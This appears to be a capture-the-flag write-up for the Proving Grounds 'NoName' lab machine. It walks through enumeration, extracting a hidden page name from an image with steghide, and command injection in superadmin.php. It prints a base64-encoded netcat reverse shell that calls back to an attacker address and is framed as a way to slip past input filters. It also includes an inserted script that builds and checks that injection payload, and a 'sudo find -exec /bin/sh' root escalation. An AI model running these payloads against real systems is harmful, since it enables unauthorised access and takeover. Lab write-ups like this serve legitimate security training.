Proving Grounds Play: NoName

RATING

Intermediate

ENUMERATION

We kick things off with our usual nmap scan:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.15

Navigating to the target in our browser, we are met with what appears to be a fake admin area with no functionality:

We proceed to directory bruteforce with feroxbuster and discover http://192.168.201.15/admin:

Command: feroxbuster -u http://192.168.201.15/ -w /usr/share/wordlists/dirb/common.txt -k --quiet

Navigating to http://192.168.201.15/admin, we see a page with several images:

Viewing the page source, we discover a passphrase:

We download the images and run steghide against them with the passphrase from the page source (steghide prompts for it). haclabs.jpeg yields imp.txt, which contains a base64 string that decodes to the name of a new page, superadmin.php:

Command: steghide extract -sf haclabs.jpeg

Command: cat imp.txt

Command: echo "c3VwZXJhZG1pbi5waHA=" | base64 -d

Navigating to http://192.168.201.15/superadmin.php in our browser, we see a form whose input is passed to a system command, so we can inject our own commands:

EXPLOITATION

We prepare a reverse shell command and base64 encode it. The encoded form contains only the characters A-Z, a-z, 0-9, +, / and =, so any filter that blocks spaces, quotes or shell metacharacters in the injected command never sees them (the decoding and execution still has to happen on the target, which we handle below):

Command: echo "nc.traditional -e /bin/bash 192.168.45.153 443" | base64

We start a listener, then submit a harmless value followed by a pipe into our decode-and-execute chain. Note that base64 -d only prints the decoded text; it has to be piped into bash to actually run. We catch the shell via netcat and upgrade it to a proper TTY:

Command: nc -nvlp 443

Command: 127.0.0.1 | echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDUuMTUzIDQ0Mwo=" | base64 -d | bash

Command: python3 -c 'import pty; pty.spawn("/bin/bash")'
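As an added example (not part of the original write-up), the following shell script reproduces the payload construction above and checks it offline before anything is submitted to the target. The attacker address and port (192.168.45.153, 443) are the page's; the function names and the assumption that superadmin.php concatenates the field into a shell command (which is why a leading `127.0.0.1 |` is harmless) are mine.

```shell
#!/bin/sh
# Added example: build and verify the base64-wrapped reverse-shell injection.
# Assumes the target has nc.traditional (supports -e), as the page found.

# Encode the reverse-shell command the same way the page does. echo adds a
# trailing newline, so printf '%s\n' reproduces the page's exact string.
b64_revshell() {
    lhost=$1
    lport=$2
    printf '%s\n' "nc.traditional -e /bin/bash $lhost $lport" | base64 | tr -d '\n'
}

# Full line for the command field: a harmless value, then decode-and-execute.
# base64 -d alone only prints the text; the trailing "| bash" is what runs it.
inject_payload() {
    printf '127.0.0.1 | echo "%s" | base64 -d | bash' "$(b64_revshell "$1" "$2")"
}

# Decode locally to confirm the string really is the intended command.
# This catches copy/paste truncation of the encoded blob.
decode_payload() {
    printf '%s' "$1" | base64 -d
}

# Return 0 if the encoded form contains nothing outside the base64 alphabet,
# i.e. no spaces, quotes, ';', '&' or other characters a blocklist might key on.
encoded_is_clean() {
    if printf '%s' "$1" | grep -q '[^A-Za-z0-9+/=]'; then
        return 1
    fi
    return 0
}

# Usage: ./payload.sh --demo
if [ "${1:-}" = "--demo" ]; then
    enc=$(b64_revshell 192.168.45.153 443)
    echo "encoded: $enc"
    echo "decoded: $(decode_payload "$enc")"
    echo "inject:  $(inject_payload 192.168.45.153 443)"
    encoded_is_clean "$enc" && echo "encoded form uses only base64 characters"
fi
```

The round-trip check is worth the ten seconds: a reverse shell that never connects is far more often a mangled base64 string or a missing `| bash` than a blocked port.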

PRIVILEGE ESCALATION

Looking around the target, we find that user yash's home directory contains a flag1.txt, which hints that a hidden file somewhere holds the password for user haclabs:

Command: ls -l

Command: cat flag1.txt

Rather than guess where the hidden file lives, we search the whole filesystem for files owned by yash (discarding permission errors). This turns up /usr/share/hidden/.passwd, which contains the password haclabs1234:

Command: find / -type f -user yash 2>/dev/null

Command: cat /usr/share/hidden/.passwd

After switching to user haclabs with the recovered password (su haclabs), we check sudo privileges with sudo -l and see that haclabs can run find as root. GTFOBins documents the -exec trick: find spawns /bin/sh as root for the first file it encounters, and -quit stops it after that single invocation so we are not dropped into a new shell for every file. From the root shell we read proof.txt:

Command: sudo find . -exec /bin/sh \; -quit